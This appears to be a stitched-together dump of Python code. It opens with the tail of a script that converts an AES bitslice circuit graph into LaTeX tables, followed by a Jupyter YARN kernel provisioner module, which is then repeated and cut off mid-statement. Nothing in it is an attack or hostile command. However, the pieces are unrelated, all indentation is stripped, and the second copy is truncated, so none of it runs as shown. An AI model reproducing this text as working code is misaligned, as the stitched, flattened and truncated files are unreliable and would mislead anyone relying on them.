('t29s2', 'z5', 0), ('t27s2', 't35', 0), ('t33s3', 'z11', 0), ('t36s0', 't38', 0), ('y16s0', 'z3', 0), ('t40s2', 't43', 0),
('t33s5', 't44', 0), ('t29s3', 't42', 0), ('t33s4', 't42', 0), ('t29', 't29s2', 0), ('z4', 'o4', 0), ('y15s0', 't2', 0),
('y5s0', 't8', 0), ('x7', 'x7s1', 0), ('t37', 't37s3', 0), ('t24s3', 't30', 0), ('t33s2', 't35', 0), ('t37s2', 'z1', 0),
('t33s4', 'z11', 0), ('t33s1', 'z2', 0), ('t33s1', 't35', 0), ('x7s0', 'z2', 0), ('t42', 't42s0', 0), ('t12s0', 't14' , 0),
('t12s1', 't16', 0), ('t40s1', 'z4', 0), ('t42s2', 'z6', 0), ('t44', 't44s1', 0), ('t37s1', 'z1', 0), ('y16s0', 't7', 0),
('t25s0', 't28', 0), ('t33s2', 'z11', 0), ('t29s3', 'z14', 0), ('t44s1', 'z9', 0), ('t33s4', 'z2', 0), ('y8', 'y8s1', 0),
('t24s1', 't36', 0), ('t29s0', 't43', 0), ('t24', 't24s1', 0), ('y14s0', 'z16', 0), ('t43s0', 'z3', 0), ('t27s1', 't28', 0),
('y14s0', 't13', 0), ('y2s0', 'z14', 0), ('t40s0', 'z13', 0), ('t24s3', 't33', 0), ('y9s0', 'z15', 0), ('t23s1', 't30', 0),
('t41s0', 'z8', 0), ('t33s5', 't35', 0), ('y9', 'y9s1', 0), ('t29s3', 'z5', 0), ('t24s0', 't33', 0), ('t22s0', 't31', 0),
('t40s0', 't41', 0), ('y1s0', 'z4', 0), ('t26', 't26s1', 0), ('y15s0', 'z0', 0), ('t7s0', 't9', 0), ('x7s0', 't5', 0),
('t29s3', 't39', 0), ('t42s2', 'z15', 0), ('y16', 'y16s1', 0), ('t37s2', 't41', 0), ('t24s3', 't36', 0), ('t37s0', 'z10', 0),
('t33s3', 't34', 0), ('y14', 'y14s1', 0), ('y13', 'y13s1', 0), ('t33s4', 't34', 0), ('t29s1', 'z14', 0), ('t24s2', 't30', 0),
('y8s0', 'z17', 0), ('t37s1', 't41', 0), ('y6s0', 'z1', 0), ('t22s2', 't29', 0), ('t24s0', 't30', 0), ('y11', 'y11s1', 0),
('y10', 'y10s1', 0), ('t26s0', 't31', 0), ('t22s1', 't25', 0), ('t2s0', 't4', 0), ('t21', 't21s1', 0), ('t37s3', 'z10', 0),
('t33', 't33s0', 0), ('t24s0', 't27', 0), ('t33s2', 't34', 0), ('t27s2', 't38', 0), ('t21s0', 't26', 0), ('t40s1', 'z13', 0),
('y11s0', 't12', 0), ('t29s0', 't39', 0), ('t37s1', 't44', 0), ('t40s0', 't43', 0), ('t16s1', 't20', 0), ('t33s1', 't42', 0),
('t29s1', 't39', 0), ('y6', 'y6s1', 0), ('z10', 'o10', 0), ('t22s1', 't31', 0), ('t32', 't33', 0), ('t29s4', 'z14', 0),
('t22s0', 't25', 0), ('t23s1', 't26', 0), ('t21s0', 't25', 0), ('z17', 'o17', 0), ('t36s0', 't37', 0), ('t45s0', 'z16', 0),
('y6s0', 't3', 0)]
nok = [x for x in cut_edges if ' ' in x[0]+x[1]]
assert not nok, nok
print(len(cut_edges))
def rename_split(g, cut, split_c_d):
rename = dict()
for n, sg in split_c_d.items():
sg = [s for s in sg if s in g.nodes]
rename.update((s, f'{n}s{i}') for i, s in enumerate(sg))
return rename
def export_graph(g, cut, split_c_d):
cut = {(x, y) for x, y, *_ in cut}
rename = rename_split(g, cut, split_c_d)
def mn(n):
return rename.get(n, n)
def test_refresh(src, dest):
return f"\\refresh({format_var(mn(src))})" if (src, dest) in cut else format_var(mn(src))
for n in nx.topological_sort(g):
pred = list(g.predecessors(n))
if len(pred) == 0:
assert 'op' not in g.nodes[n], f"{n}, {g.nodes[n]['op']}"
elif len(pred) == 1:
assert 'op' not in g.nodes[n], f"{n}, {g.nodes[n]['op']}"
yield format_var(mn(n)) + "=" + test_refresh(pred[0], n)
elif len(pred) == 2:
op = g.nodes[n]['op']
o1 = test_refresh(pred[0], n)
o2 = test_refresh(pred[1], n)
op = op.replace('*', r'\cdot')
yield format_var(mn(n)) + " = " + o1 + f' {op} ' + o2
else:
raise ValueError(f"{n}, {pred}")
def format_var(l):
re_var = r'([a-z])([0-9]+)([a-z]?)([0-9]*)'
res = re.match(re_var, l)
assert res, l
n0, n1, n2, n3 = res.groups()
sp_comp = ',' + n3 if n2 else ''
#sp_comp = ',' + n2 + '_{' + n3 + '}' if n2 else ''
return n0 + '_{' + n1 + sp_comp + '}'
def format_assign(l):
if 'not' in l:
re_var_simple = r'[a-z][0-9]+'
res = re.match(f'({re_var_simple})=not\\(({re_var_simple})(\\*|\\+)({re_var_simple})\\)', l)
assert res, l
dest, src1, op, src2 = res.groups()
op = op.replace('*', r'\cdot')
res = format_var(dest) + ' = \\lognot(' + format_var(src1) + f' {op} ' + format_var(src2) + ')'
else:
dest, op, (src1, src2) = parse.parse_assignment(l)
op = op.replace('*', r'\cdot')
res = format_var(dest) + ' = ' + format_var(src1) + f' {op} ' + format_var(src2)
return f'${res}$ \\\\'
def sort_assign(l):
def k(s):
"$X_{DD}..."
s = s[1:]
return (s[0], int(''.join(filter(str.isdigit, s[3:5]))), s[5:].replace(',', 'z').replace('}', 'a'))
return list(sorted(l, key=k))
g4, simplified_cut_edges = graph_tools.without_unncessary_splits(g, cut_edges, split_c_d)
print(len(simplified_cut_edges))
exp = list(export_graph(g4, simplified_cut_edges, split_c_d))
exp = sort_assign(f'${x}$ \\\\' for x in exp)
exp_old = exp
exp = (
[x for x in exp if x.startswith('$x')] +
[x for x in exp if x.startswith('$y')] +
[x for x in exp if x.startswith('$t')] +
[x for x in exp if x.startswith('$z')] +
[x for x in exp if x.startswith('$o')]
)
s_in = open('repr_aes_bitslice/lin_in.txt').read()
s_out = open('repr_aes_bitslice/lin_out_not.txt').read()
s_out = s_out.replace('z', 'o')
exp_out = sort_assign(map(format_assign, s_out.splitlines()))
exp_out = (
[x for x in exp_out if x.startswith('$t')] +
[x for x in exp_out if x.startswith('$s')]
)
s = (
'\\begin{multicols}{5}\n' +
'[Top linear layer\n]\n' +
r'\noindent' +
'\n'.join(sort_assign(map(format_assign, s_in.splitlines()))) + '\n' +
'\\end{multicols}\n\n' +
'\\begin{multicols}{5}\n' +
'[Middle non-linear layer\n]\n' +
r'\noindent' +
'\n'.join(exp) + '\n' +
'\\end{multicols}\n\n' +
'\\begin{multicols}{5}\n' +
'[Bottom linear layer\n]\n' +
r'\noindent' +
'\n'.join(exp_out) + '\n' +
'\\end{multicols}\n'
)
print(s)
|
# Copyright (c) Jupyter Development Team.
# Distributed under the terms of the Modified BSD License.
"""Code related to managing kernels running in YARN clusters."""
import asyncio
import errno
import logging
import os
import signal
import socket
import time
from traitlets import default, Unicode, Bool
from typing import Any, Dict, List, Optional, Tuple
from yarn_api_client.resource_manager import ResourceManager
from .remote_provisioner import RemoteProvisionerBase
# Default logging level of yarn-api and underlying connectionpool produce too much noise - raise to warning only.
logging.getLogger('yarn_api_client').setLevel(os.getenv('YP_YARN_LOG_LEVEL', logging.WARNING))
logging.getLogger('urllib3.connectionpool').setLevel(os.environ.get('YP_YARN_LOG_LEVEL', logging.WARNING))
poll_interval = float(os.getenv('EG_POLL_INTERVAL', '0.5'))
max_poll_attempts = int(os.getenv('EG_MAX_POLL_ATTEMPTS', '10'))
yarn_shutdown_wait_time = float(os.getenv('RP_YARN_SHUTDOWN_WAIT_TIME', '15.0'))
# cert_path: Boolean, defaults to `True`, that controls
# whether we verify the server's TLS certificate in yarn-api-client.
# Or a string, in which case it must be a path to a CA bundle(.pem file) to use.
cert_path = os.getenv('EG_YARN_CERT_BUNDLE', True)
class YarnProvisioner(RemoteProvisionerBase):
"""
Kernel lifecycle management for YARN clusters.
"""
yarn_endpoint_env = 'RP_YARN_ENDPOINT'
yarn_endpoint = Unicode(None, config=True, allow_none=True,
help="""The http url specifying the YARN Resource Manager. Note: If this value is NOT set,
the YARN library will use the files within the local HADOOP_CONFIG_DIR to determine the
active resource manager. (RP_YARN_ENDPOINT env var)""")
@default('yarn_endpoint')
def yarn_endpoint_default(self):
return os.getenv(self.yarn_endpoint_env)
# Alt Yarn endpoint
alt_yarn_endpoint_env = 'RP_ALT_YARN_ENDPOINT'
alt_yarn_endpoint = Unicode(None, config=True, allow_none=True,
help="""The http url specifying the alternate YARN Resource Manager. This value should
be set when YARN Resource Managers are configured for high availability. Note: If both
YARN endpoints are NOT set, the YARN library will use the files within the local
HADOOP_CONFIG_DIR to determine the active resource manager.
(RP_ALT_YARN_ENDPOINT env var)""")
@default('alt_yarn_endpoint')
def alt_yarn_endpoint_default(self):
return os.getenv(self.alt_yarn_endpoint_env)
yarn_endpoint_security_enabled_env = 'RP_YARN_ENDPOINT_SECURITY_ENABLED'
yarn_endpoint_security_enabled_default_value = False
yarn_endpoint_security_enabled = Bool(yarn_endpoint_security_enabled_default_value, config=True,
help="""Is YARN Kerberos/SPNEGO Security enabled (True/False).
(RP_YARN_ENDPOINT_SECURITY_ENABLED env var)""")
@default('yarn_endpoint_security_enabled')
def yarn_endpoint_security_enabled_default(self):
return bool(os.getenv(self.yarn_endpoint_security_enabled_env,
self.yarn_endpoint_security_enabled_default_value))
initial_states = {'NEW', 'SUBMITTED', 'ACCEPTED', 'RUNNING'}
final_states = {'FINISHED', 'KILLED', 'FAILED'}
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.application_id = None
self.last_known_state = None
self.candidate_queue = None
self.candidate_partition = None
endpoints = None
if self.yarn_endpoint:
endpoints = [self.yarn_endpoint]
# Only check alternate if "primary" is set.
if self.alt_yarn_endpoint:
endpoints.append(self.alt_yarn_endpoint)
auth = None
if self.yarn_endpoint_security_enabled:
from requests_kerberos import HTTPKerberosAuth
auth = HTTPKerberosAuth()
self.resource_mgr = ResourceManager(service_endpoints=endpoints, auth=auth, verify=cert_path)
self.rm_addr = self.resource_mgr.get_active_endpoint()
# If yarn resource check is enabled and it isn't available immediately,
# 20% of kernel_launch_timeout is used to wait
# and retry at fixed interval before pronouncing as not feasible to launch.
self.yarn_resource_check_wait_time = 0.20 * self.launch_timeout
async def pre_launch(self, **kwargs: Any) -> Dict[str, Any]:
"""
Launches the specified process within a YARN cluster environment.
"""
self.application_id = None
self.last_known_state = None
self.candidate_queue = None
self.candidate_partition = None
kwargs = await super().pre_launch(**kwargs)
# checks to see if the queue resource is available
# if not available, kernel startup is not attempted
self.confirm_yarn_queue_availability(**kwargs)
return kwargs
def log_kernel_launch(self, cmd: List[str]) -> None:
self.log.info(f"{self.__class__.__name__}: kernel launched. YARN RM: {self.rm_addr}, "
f"pid: {self.local_proc.pid}, Kernel ID: {self.kernel_id}, cmd: '{cmd}'")
def get_shutdown_wait_time(self, recommended: Optional[float] = 5.0) -> float:
"""Returns the time allowed for a complete shutdown. This may vary by provisioner.
The recommended value will typically be what is configured in the kernel manager.
"""
# YARN applications tend to take longer than the default 5 second wait time. Rather than
# require a command-line option for those using YARN, we'll adjust based on a local env that
# defaults to 15 seconds. Note: we'll only adjust if the current wait time is shorter than
# the desired value.
if recommended < yarn_shutdown_wait_time:
recommended = yarn_shutdown_wait_time
self.log.debug(f"{type(self).__name__} shutdown wait time adjusted to {recommended} seconds.")
return recommended
def confirm_yarn_queue_availability(self, **kwargs: Dict[str, Any]) -> None:
"""
Submitting jobs to yarn queue and then checking till the jobs are in running state
will lead to orphan jobs being created in some scenarios.
We take kernel_launch_timeout time and divide this into two parts.
If the queue is unavailable we take max 20% of the time to poll the queue periodically
and if the queue becomes available the rest of timeout is met in 80% of the remaining
time.
This algorithm is subject to change. Please read the below cases to understand
when and how checks are applied.
Confirms if the yarn queue has capacity to handle the resource requests that
will be sent to it.
First check ensures the driver and executor memory request falls within
the container size of yarn configuration. This check requires executor and
driver memory to be available in the env.
Second,Current version of check, takes into consideration node label partitioning
on given queues. Provided the queue name and node label this checks if
the given partition has capacity available for kernel startup.
All Checks are optional. If we have KERNEL_EXECUTOR_MEMORY and KERNEL_DRIVER_MEMORY
specified, first check is performed.
If we have KERNEL_QUEUE and KERNEL_NODE_LABEL specified, second check is performed.
Proper error messages are sent back for user experience
:param kwargs:
:return:
"""
env_dict = kwargs.get('env', {})
executor_memory = int(env_dict.get('KERNEL_EXECUTOR_MEMORY', 0))
driver_memory = int(env_dict.get('KERNEL_DRIVER_MEMORY', 0))
if executor_memory * driver_memory > 0:
container_memory = self.resource_mgr.cluster_node_container_memory()
if max(executor_memory, driver_memory) > container_memory:
self.log_and_raise(ValueError("Container Memory not sufficient for a executor/driver allocation"))
candidate_queue_name = (env_dict.get('KERNEL_QUEUE', None))
node_label = env_dict.get('KERNEL_NODE_LABEL', None)
partition_availability_threshold = float(env_dict.get('YARN_PARTITION_THRESHOLD', 95.0))
if candidate_queue_name is None or node_label is None:
return
# else the resources may or may not be available now. it may be possible that if we wait then the resources
# become available. start a timeout process
self.start_time = RemoteProvisionerBase.get_current_time()
self.candidate_queue = self.resource_mgr.cluster_scheduler_queue(candidate_queue_name)
if self.candidate_queue is None:
self.log.warning(f"Queue: {candidate_queue_name} not found in cluster. "
"Availability check will not be performed")
return
self.candidate_partition = self.resource_mgr.cluster_queue_partition(self.candidate_queue, node_label)
if self.candidate_partition is None:
self.log.debug(f"Partition: {node_label} not found in {candidate_queue_name} queue."
"Availability check will not be performed")
return
self.log.debug(f"Checking endpoint: {self.yarn_endpoint} if partition: {self.candidate_partition} "
f"has used capacity <= {partition_availability_threshold}%")
yarn_available = self.resource_mgr.cluster_scheduler_queue_availability(self.candidate_partition,
partition_availability_threshold)
if not yarn_available:
self.log.debug(
f"Retrying for {self.yarn_resource_check_wait_time} ms since resources are not available")
while not yarn_available:
self.handle_yarn_queue_timeout()
yarn_available = self.resource_mgr.cluster_scheduler_queue_availability(
self.candidate_partition, partition_availability_threshold)
# subtracting the total amount of time spent for polling for queue availability
self.launch_timeout -= RemoteProvisionerBase.get_time_diff(self.start_time)
def handle_yarn_queue_timeout(self) -> None:
time.sleep(poll_interval)
time_interval = RemoteProvisionerBase.get_time_diff(self.start_time)
if time_interval > self.yarn_resource_check_wait_time:
reason = f"Yarn Compute Resource is unavailable after {self.yarn_resource_check_wait_time} seconds"
self.log_and_raise(TimeoutError(reason))
@property
def has_process(self) -> bool:
return self.local_proc is not None or self.application_id is not None
async def poll(self) -> Optional[int]:
"""Submitting a new kernel/app to YARN will take a while to be ACCEPTED.
Thus application ID will probably not be available immediately for poll.
So will regard the application as RUNNING when application ID still in ACCEPTED or SUBMITTED state.
:return: None if the application's ID is available and state is ACCEPTED/SUBMITTED/RUNNING. Otherwise 0.
"""
result = 0
if self._get_application_id():
state = self._query_app_state_by_id(self.application_id)
if state in YarnProvisioner.initial_states:
result = None
# The following produces too much output (every 3 seconds by default), so commented-out at this time.
# self.log.debug("YarnProcessProxy.poll, application ID: {}, kernel ID: {}, state: {}".
# format(self.application_id, self.kernel_id, state))
return result
async def send_signal(self, signum: int) -> None:
"""Currently only support 0 as poll and other as kill.
:param signum
:return:
"""
if signum == 0:
return await self.poll()
elif signum == signal.SIGKILL:
return await self.kill()
else:
# Yarn api doesn't support the equivalent to interrupts, so take our chances
# via a remote signal. Note that this condition cannot check against the
# signum value because alternate interrupt signals might be in play.
return await super().send_signal(signum)
async def kill(self, restart: bool = False) -> None:
"""Kill a kernel.
:return: None if the application existed and is not in RUNNING state, False otherwise.
"""
state = None
result = False
if self._get_application_id():
result, state = await self.shutdown_application()
if result is False: # We couldn't terminate via Yarn, try remote signal
result = await super().send_signal(signal.SIGKILL) # Must use super here, else infinite
self.log.debug(f"YarnProvisioner.kill, application ID: {self.application_id}, "
f"kernel ID: {self.kernel_id}, state: {state}, result: {result}")
return result
async def terminate(self, restart: bool = False) -> None:
"""Terminate a kernel.
Similar to kill except that the follow-on kill step is not taken if termination is not confirmed.
"""
state = None
result = False
if self._get_application_id():
result, state = await self.shutdown_application()
self.log.debug(f"YarnProvisioner.terminate, application ID: {self.application_id}, "
f"kernel ID: {self.kernel_id}, state: {state}, result: {result}")
return result
async def shutdown_application(self) -> Tuple[Optional[bool], str]:
"""Shuts down the YARN application, returning None if final state is confirmed, False otherwise."""
result = False
self._kill_app_by_id(self.application_id)
# Check that state has moved to a final state (most likely KILLED)
i = 1
state = self._query_app_state_by_id(self.application_id)
while state not in YarnProvisioner.final_states and i <= max_poll_attempts:
await asyncio.sleep(poll_interval)
state = self._query_app_state_by_id(self.application_id)
i = i + 1
if state in YarnProvisioner.final_states:
result = None
return result, state
async def cleanup(self, restart: bool = False):
""""""
# we might have a defunct process (if using waitAppCompletion = false) - so poll, kill, wait when we have
# a local_proc.
if self.local_proc:
self.log.debug(f"YarnProvisioner.cleanup: Clearing possible defunct "
f"process, pid={self.local_proc.pid}...")
if self.local_proc.poll():
self.local_proc.kill()
self.local_proc.wait()
self.local_proc = None
# reset application id to force new query - handles kernel restarts/interrupts
self.application_id = None
# for cleanup, we should call the superclass last
await super().cleanup(restart=restart)
async def confirm_remote_startup(self):
"""
Confirms the yarn application is in a started state before returning.
Should post-RUNNING states be unexpectedly encountered (FINISHED, KILLED, FAILED)
then we must throw, otherwise the rest of the gateway will believe its talking
to a valid kernel.
Note: This is a complete override of the superclass method.
"""
self.start_time = RemoteProvisionerBase.get_current_time()
i = 0
ready_to_connect = False # we're ready to connect when we have a connection file to use
while not ready_to_connect:
i += 1
await self.handle_launch_timeout()
if self._get_application_id(True):
# Once we have an application ID, start monitoring state, obtain assigned host and get connection info
app_state = self._get_application_state()
if app_state in YarnProvisioner.final_states:
error_message = f"KernelID: '{self.kernel_id}', ApplicationID: '{self.application_id}' " \
f"unexpectedly found in state '{app_state}' during kernel startup!"
self.log_and_raise(RuntimeError(error_message))
self.log.debug(f"{i}: State: '{app_state}', Host: '{self.assigned_host}', "
f"KernelID: '{self.kernel_id}', ApplicationID: '{self.application_id}'")
if self.assigned_host != '':
ready_to_connect = await self.receive_connection_info()
else:
self.detect_launch_failure()
async def handle_launch_timeout(self):
"""
Checks to see if the kernel launch timeout has been exceeded while awaiting connection info.
Note: This is a complete override of the superclass method.
"""
await asyncio.sleep(poll_interval)
time_interval = RemoteProvisionerBase.get_time_diff(self.start_time)
if time_interval > self.launch_timeout:
reason = f"Application ID is None. Failed to submit a new application to YARN within " \
f"{self.launch_timeout} seconds. Check server log for more information."
if self._get_application_id(True):
if self._query_app_state_by_id(self.application_id) != "RUNNING":
reason = f"YARN resources unavailable after {time_interval} seconds for " \
f"app {self.application_id}, launch timeout: {self.launch_timeout}! " \
"Check YARN configuration."
else:
reason = f"App {self.application_id} is RUNNING, but waited too long " \
f"({self.launch_timeout} secs) to get connection file. " \
f"Check YARN logs for more information."
await self.kill()
timeout_message = f"KernelID: '{self.kernel_id}' launch timeout due to: {reason}"
self.log_and_raise(TimeoutError(timeout_message))
async def get_provisioner_info(self) -> Dict:
"""Captures the base information necessary for kernel persistence relative to YARN clusters."""
provisioner_info = await super().get_provisioner_info()
provisioner_info.update({'application_id': self.application_id})
return provisioner_info
async def load_provisioner_info(self, provisioner_info: Dict) -> None:
"""Loads the base information necessary for kernel persistence relative to YARN clusters."""
await super().load_provisioner_info(provisioner_info)
self.application_id = provisioner_info['application_id']
def _get_application_state(self) -> str:
# Gets the current application state using the application_id already obtained. Once the assigned host
# has been identified, 'amHostHttpAddress' is nolonger accessed.
app_state = self.last_known_state
app = self._query_app_by_id(self.application_id)
if app:
if app.get('state'):
app_state = app.get('state')
self.last_known_state = app_state
if self.assigned_host == '' and app.get('amHostHttpAddress'):
self.assigned_host = app.get('amHostHttpAddress').split(':')[0]
# Set the kernel manager ip to the actual host where the application landed.
self.assigned_ip = socket.gethostbyname(self.assigned_host)
return app_state
def _get_application_id(self, ignore_final_states: bool = False) -> str:
# Return the kernel's YARN application ID if available, otherwise None. If we're obtaining application_id
# from scratch, do not consider kernels in final states.
if not self.application_id:
app = self._query_app_by_name(self.kernel_id)
state_condition = True
if type(app) is dict:
state = app.get('state')
self.last_known_state = state
if ignore_final_states:
state_condition = state not in YarnProvisioner.final_states
if len(app.get('id', '')) > 0 and state_condition:
self.application_id = app['id']
time_interval = RemoteProvisionerBase.get_time_diff(self.start_time)
self.log.info(f"ApplicationID: '{app["id"]}' assigned for KernelID: '{self.kernel_id}', "
f"state: {state}, {time_interval} seconds after starting.")
if not self.application_id:
self.log.debug(f"ApplicationID not yet assigned for KernelID: '{self.kernel_id}' - retrying...")
return self.application_id
def _query_app_by_name(self, kernel_id: str) -> dict:
"""Retrieve application by using kernel_id as the unique app name.
With the started_time_begin as a parameter to filter applications started earlier than the target one from YARN.
When submit a new app, it may take a while for YARN to accept and run and generate the application ID.
Note: if a kernel restarts with the same kernel id as app name, multiple applications will be returned.
For now, the app/kernel with the top most application ID will be returned as the target app, assuming the app
ID will be incremented automatically on the YARN side.
:param kernel_id: as the unique app name for query
:return: The JSON object of an application.
"""
top_most_app_id = ''
target_app = None
try:
response = self.resource_mgr.cluster_applications(started_time_begin=str(self.start_time))
except socket.error as sock_err:
if sock_err.errno == errno.ECONNREFUSED:
self.log.warning(f"YARN RM address: '{self.rm_addr}' refused the connection. "
f"Is the resource manager running?")
else:
self.log.warning(f"Query for kernel ID '{kernel_id}' failed with exception: "
f"{type(sock_err)} - '{sock_err}'. Continuing...")
except Exception as e:
self.log.warning(f"Query for kernel ID '{kernel_id}' failed with exception: "
f"{type(e)} - '{e}'. Continuing...")
else:
data = response.data
if type(data) is dict and type(data.get("apps")) is dict and 'app' in data.get("apps"):
for app in data['apps']['app']:
if app.get('name', '').find(kernel_id) >= 0 and app.get('id') > top_most_app_id:
target_app = app
top_most_app_id = app.get('id')
return target_app
def _query_app_by_id(self, app_id: str) -> dict:
"""Retrieve an application by application ID.
:param app_id
:return: The JSON object of an application.
"""
app = None
try:
response = self.resource_mgr.cluster_application(application_id=app_id)
except Exception as e:
self.log.warning(f"Query for application ID '{app_id}' failed with exception: '{e}'. Continuing...")
else:
data = response.data
if type(data) is dict and 'app' in data:
app = data['app']
return app
def _query_app_state_by_id(self, app_id: str) -> str:
"""Return the state of an application. If a failure occurs, the last known state is returned.
:param app_id:
:return: application state (str)
"""
state = self.last_known_state
try:
response = self.resource_mgr.cluster_application_state(application_id=app_id)
except Exception as e:
self.log.warning(f"Query for application '{app_id}' state failed with exception: '{e}'. "
f"Continuing with last known state = '{state}'...")
else:
state = response.data['state']
self.last_known_state = state
return state
def _kill_app_by_id(self, app_id: str) -> dict:
"""Kill an application. If the app's state is FINISHED or FAILED, it won't be changed to KILLED.
:param app_id
:return: The JSON response of killing the application.
"""
response = {}
try:
response = self.resource_mgr.cluster_application_kill(application_id=app_id)
except Exception as e:
self.log.warning(f"Termination of application '{app_id}' failed with exception: '{e}'. Continuing...")
return response
| # Copyright (c) Jupyter Development Team.
# Distributed under the terms of the Modified BSD License.
"""Code related to managing kernels running in YARN clusters."""
import asyncio
import errno
import logging
import os
import signal
import socket
import time
from traitlets import default, Unicode, Bool
from typing import Any, Dict, List, Optional, Tuple
from yarn_api_client.resource_manager import ResourceManager
from .remote_provisioner import RemoteProvisionerBase
# Default logging level of yarn-api and underlying connectionpool produce too much noise - raise to warning only.
logging.getLogger('yarn_api_client').setLevel(os.getenv('YP_YARN_LOG_LEVEL', logging.WARNING))
logging.getLogger('urllib3.connectionpool').setLevel(os.environ.get('YP_YARN_LOG_LEVEL', logging.WARNING))
poll_interval = float(os.getenv('EG_POLL_INTERVAL', '0.5'))
max_poll_attempts = int(os.getenv('EG_MAX_POLL_ATTEMPTS', '10'))
yarn_shutdown_wait_time = float(os.getenv('RP_YARN_SHUTDOWN_WAIT_TIME', '15.0'))
# cert_path: Boolean, defaults to `True`, that controls
# whether we verify the server's TLS certificate in yarn-api-client.
# Or a string, in which case it must be a path to a CA bundle(.pem file) to use.
cert_path = os.getenv('EG_YARN_CERT_BUNDLE', True)
class YarnProvisioner(RemoteProvisionerBase):
"""
Kernel lifecycle management for YARN clusters.
"""
yarn_endpoint_env = 'RP_YARN_ENDPOINT'
yarn_endpoint = Unicode(None, config=True, allow_none=True,
help="""The http url specifying the YARN Resource Manager. Note: If this value is NOT set,
the YARN library will use the files within the local HADOOP_CONFIG_DIR to determine the
active resource manager. (RP_YARN_ENDPOINT env var)""")
@default('yarn_endpoint')
def yarn_endpoint_default(self):
return os.getenv(self.yarn_endpoint_env)
# Alt Yarn endpoint
alt_yarn_endpoint_env = 'RP_ALT_YARN_ENDPOINT'
alt_yarn_endpoint = Unicode(None, config=True, allow_none=True,
help="""The http url specifying the alternate YARN Resource Manager. This value should
be set when YARN Resource Managers are configured for high availability. Note: If both
YARN endpoints are NOT set, the YARN library will use the files within the local
HADOOP_CONFIG_DIR to determine the active resource manager.
(RP_ALT_YARN_ENDPOINT env var)""")
@default('alt_yarn_endpoint')
def alt_yarn_endpoint_default(self):
return os.getenv(self.alt_yarn_endpoint_env)
yarn_endpoint_security_enabled_env = 'RP_YARN_ENDPOINT_SECURITY_ENABLED'
yarn_endpoint_security_enabled_default_value = False
yarn_endpoint_security_enabled = Bool(yarn_endpoint_security_enabled_default_value, config=True,
help="""Is YARN Kerberos/SPNEGO Security enabled (True/False).
(RP_YARN_ENDPOINT_SECURITY_ENABLED env var)""")
@default('yarn_endpoint_security_enabled')
def yarn_endpoint_security_enabled_default(self):
return bool(os.getenv(self.yarn_endpoint_security_enabled_env,
self.yarn_endpoint_security_enabled_default_value))
initial_states = {'NEW', 'SUBMITTED', 'ACCEPTED', 'RUNNING'}
final_states = {'FINISHED', 'KILLED', 'FAILED'}
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.application_id = None
self.last_known_state = None
self.candidate_queue = None
self.candidate_partition = None
endpoints = None
if self.yarn_endpoint:
endpoints = [self.yarn_endpoint]
# Only check alternate if "primary" is set.
if self.alt_yarn_endpoint:
endpoints.append(self.alt_yarn_endpoint)
auth = None
if self.yarn_endpoint_security_enabled:
from requests_kerberos import HTTPKerberosAuth
auth = HTTPKerberosAuth()
self.resource_mgr = ResourceManager(service_endpoints=endpoints, auth=auth, verify=cert_path)
self.rm_addr = self.resource_mgr.get_active_endpoint()
# If yarn resource check is enabled and it isn't available immediately,
# 20% of kernel_launch_timeout is used to wait
# and retry at fixed interval before pronouncing as not feasible to launch.
self.yarn_resource_check_wait_time = 0.20 * self.launch_timeout
async def pre_launch(self, **kwargs: Any) -> Dict[str, Any]:
"""
Launches the specified process within a YARN cluster environment.
"""
self.application_id = None
self.last_known_state = None
self.candidate_queue = None
self.candidate_partition = None
kwargs = await super().pre_launch(**kwargs)
# checks to see if the queue resource is available
# if not available, kernel startup is not attempted
self.confirm_yarn_queue_availability(**kwargs)
return kwargs
def log_kernel_launch(self, cmd: List[str]) -> None:
self.log.info(f"{self.__class__.__name__}: kernel launched. YARN RM: {self.rm_addr}, "
f"pid: {self.local_proc.pid}, Kernel ID: {self.kernel_id}, cmd: '{cmd}'")
def get_shutdown_wait_time(self, recommended: Optional[float] = 5.0) -> float:
"""Returns the time allowed for a complete shutdown. This may vary by provisioner.
The recommended value will typically be what is configured in the kernel manager.
"""
# YARN applications tend to take longer than the default 5 second wait time. Rather than
# require a command-line option for those using YARN, we'll adjust based on a local env that
# defaults to 15 seconds. Note: we'll only adjust if the current wait time is shorter than
# the desired value.
if recommended < yarn_shutdown_wait_time:
recommended = yarn_shutdown_wait_time
self.log.debug(f"{type(self).__name__} shutdown wait time adjusted to {recommended} seconds.")
return recommended
def confirm_yarn_queue_availability(self, **kwargs: Dict[str, Any]) -> None:
"""
Submitting jobs to yarn queue and then checking till the jobs are in running state
will lead to orphan jobs being created in some scenarios.
We take kernel_launch_timeout time and divide this into two parts.
If the queue is unavailable we take max 20% of the time to poll the queue periodically
and if the queue becomes available the rest of timeout is met in 80% of the remaining
time.
This algorithm is subject to change. Please read the below cases to understand
when and how checks are applied.
Confirms if the yarn queue has capacity to handle the resource requests that
will be sent to it.
First check ensures the driver and executor memory request falls within
the container size of yarn configuration. This check requires executor and
driver memory to be available in the env.
Second,Current version of check, takes into consideration node label partitioning
on given queues. Provided the queue name and node label this checks if
the given partition has capacity available for kernel startup.
All Checks are optional. If we have KERNEL_EXECUTOR_MEMORY and KERNEL_DRIVER_MEMORY
specified, first check is performed.
If we have KERNEL_QUEUE and KERNEL_NODE_LABEL specified, second check is performed.
Proper error messages are sent back for user experience
:param kwargs:
:return:
"""
env_dict = kwargs.get('env', {})
executor_memory = int(env_dict.get('KERNEL_EXECUTOR_MEMORY', 0))
driver_memory = int(env_dict.get('KERNEL_DRIVER_MEMORY', 0))
if executor_memory * driver_memory > 0:
container_memory = self.resource_mgr.cluster_node_container_memory()
if max(executor_memory, driver_memory) > container_memory:
self.log_and_raise(ValueError("Container Memory not sufficient for a executor/driver allocation"))
candidate_queue_name = (env_dict.get('KERNEL_QUEUE', None))
node_label = env_dict.get('KERNEL_NODE_LABEL', None)
partition_availability_threshold = float(env_dict.get('YARN_PARTITION_THRESHOLD', 95.0))
if candidate_queue_name is None or node_label is None:
return
# else the resources may or may not be available now. it may be possible that if we wait then the resources
# become available. start a timeout process
self.start_time = RemoteProvisionerBase.get_current_time()
self.candidate_queue = self.resource_mgr.cluster_scheduler_queue(candidate_queue_name)
if self.candidate_queue is None:
self.log.warning(f"Queue: {candidate_queue_name} not found in cluster. "
"Availability check will not be performed")
return
self.candidate_partition = self.resource_mgr.cluster_queue_partition(self.candidate_queue, node_label)
if self.candidate_partition is None:
self.log.debug(f"Partition: {node_label} not found in {candidate_queue_name} queue."
"Availability check will not be performed")
return
self.log.debug(f"Checking endpoint: {self.yarn_endpoint} if partition: {self.candidate_partition} "
